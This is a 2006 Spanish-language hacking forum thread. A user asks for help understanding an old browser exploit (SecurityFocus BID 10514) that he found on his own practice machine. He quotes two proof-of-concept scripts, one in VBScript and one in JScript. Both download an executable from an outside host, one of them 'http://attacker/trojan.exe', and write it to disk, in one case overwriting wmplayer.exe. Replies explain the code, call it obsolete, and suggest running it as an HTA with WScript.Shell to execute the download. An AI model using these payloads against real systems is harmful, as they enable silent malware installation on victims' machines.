elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 18:17  


Tema destacado: Únete al Grupo Steam elhacker.NET

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Me ayudan con un Bug encontrado
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Me ayudan con un Bug encontrado  (Leído 1,896 veces)
NaNo N´RoSeS

Desconectado Desconectado

Mensajes: 252

..::NaNo Fuck´N RoSeS::..


Ver Perfil WWW
Me ayudan con un Bug encontrado
« en: 2 Noviembre 2006, 19:23 »

Resulta que soy nuevo en esto pero no newbie, ya antes habia utilizado exploit que estaban aqui, y todo ellos estaban en c, y en perl pero este esta en otro lenguaje que no conozco, y lo encontre en una maquina que tengo especialmente para ser hackeada (para poder aprender) , pase el SSS y me arrojo u bug critico que esta aqui
http://www.securityfocus.com/bid/10514 con su respectivo exploit

<script language="vbscript">

const adTypeBinary = 1
const adSaveCreateOverwrite = 2
const adModeReadWrite = 3

set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
xmlHTTP.open "GET","http://ip3e83566f.speed.planet.nl/NOTEPAD.EXE",
false
xmlHTTP.send
contents = xmlHTTP.responseBody

Set oStr = CreateObject("ADODB.Stream")
oStr.Mode = adModeReadWrite
oStr.Type = adTypeBinary
oStr.Open

oStr.Write(contents)
oStr.SaveToFile "c:\\test.exe", adSaveCreateOverwrite

</script>

This proof-of-concept was subsequently released by Jelmer to demonstrate how the issue may be used to overwrite wmplayer.exe:

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://attacker/trojan.exe",0);
x.Send();

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);

s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";

y no entiendo muy bien como usarlo y su funcionalidad.
Me pueden ayudar a entenderlo por lo menos, y alguna sugerencia de como usarlo.

saludos
« Última modificación: 3 Noviembre 2006, 03:42 por nanonroses » En línea



- n0sEcReT -

Desconectado Desconectado

Mensajes: 282


Impossible is nothing


Ver Perfil WWW
Re: Me ayudan con un Bug encontrado
« Respuesta #1 en: 2 Noviembre 2006, 21:36 »

El exploit esta hecho en VBScript ( <script language="vbscript"> )  :rolleyes:.

Lo que hace el primer ejemplo , es descargarse el Notepad.exe desde http://ip3e83566f.speed.planet.nl/NOTEPAD.EXE  y guardarlo en c:\\test.exe.

El segundo ejemplo se descarga el archivo trojan.exe desde http://attacker/trojan.exe ( o cualquier archivo de cualquier direccion como el ejemplo de arriba ) y sobrescribe el archivo C:\\Program Files\\Windows Media Player\\wmplayer.exe

Salu2 !  ;)
En línea



-sagitari-


Desconectado Desconectado

Mensajes: 1.640


:D


Ver Perfil WWW
Re: Me ayudan con un Bug encontrado
« Respuesta #2 en: 2 Noviembre 2006, 22:22 »

Me atrevería a decir que ese código ya está obsoleto debido a su antiguedad (2003)
Es más, fue nombrado ese exploit hará bastante aquí en este foro y diría que se llegó a la conclusión de que ya no funcionaba.

Suerte.
En línea
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: Me ayudan con un Bug encontrado
« Respuesta #3 en: 3 Noviembre 2006, 00:50 »

lo puedes ejecutar con un HTA, para que veas como funciona, hasta con WScript.Shell podrias ejecutar el programa descargado :P

Saludos!!
En línea

NaNo N´RoSeS

Desconectado Desconectado

Mensajes: 252

..::NaNo Fuck´N RoSeS::..


Ver Perfil WWW
Re: Me ayudan con un Bug encontrado
« Respuesta #4 en: 3 Noviembre 2006, 03:48 »

asi es GreenDeviL, el bug es viejo, pero como dije anteriormente, çtengo un pc en donde jugar a ser Hacker xd xd xd , y este pc no tiene las actualizaciones necesarias por lomismo, para poder entender los exploit y poder explotar las vulnerabilidades.

Sdc gracias por la info pero lo unico que no entendi es el HTA, me puedes decir que es ?

saludos
En línea



sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: Me ayudan con un Bug encontrado
« Respuesta #5 en: 3 Noviembre 2006, 03:53 »

guardas el archivo como .HTA enlugar de .html

saludos!!
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
He encontrado una pistola para la PS3
Juegos y Consolas
admcasal 0 1,196 Último mensaje 22 Marzo 2011, 17:19
por admcasal
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines